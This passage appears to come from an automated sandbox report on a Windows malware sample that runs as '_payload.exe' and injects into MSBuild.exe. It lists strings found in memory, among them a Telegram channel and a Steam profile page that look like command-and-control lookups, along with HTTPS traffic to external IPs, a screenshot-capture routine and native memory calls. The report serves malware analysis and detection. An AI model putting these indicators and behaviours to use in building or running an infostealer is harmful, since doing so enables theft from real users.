00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: JDAKJD.0.dr	String found in binary or memory: https://support.mozilla.org
Source: JDAKJD.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JDAKJD.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1843666426.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1853924998.00000000032F8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349510250.0000000019ABC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001404000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp, CFCFHJ.0.dr, IIIEBG.6.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: CFCFHJ.0.dr, IIIEBG.6.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1843666426.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1853924998.00000000032F8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349510250.0000000019ABC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001404000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp, CFCFHJ.0.dr, IIIEBG.6.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: CFCFHJ.0.dr, IIIEBG.6.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17lity
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ontdrvhost.exe
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	String found in binary or memory: https://t.me/armad2a
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	String found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, CGDHIE.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, CGDHIE.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: JDAKJD.0.dr	String found in binary or memory: https://www.mozilla.org
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000004FA000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000004FA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/:
Source: JDAKJD.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000004FA000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/BKECAAKJKF
Source: JDAKJD.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2006550164.0000000025466000.00000004.00000020.00020000.00000000.sdmp, JDAKJD.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: JDAKJD.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2006550164.0000000025466000.00000004.00000020.00020000.00000000.sdmp, JDAKJD.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49773 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 6_2_00411530 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

6_2_00411530

Contains functionality to call native functions

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2BED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	0_2_6C2BED10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2FB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C2FB700
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2FB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C2FB8C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2FB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C2FB910
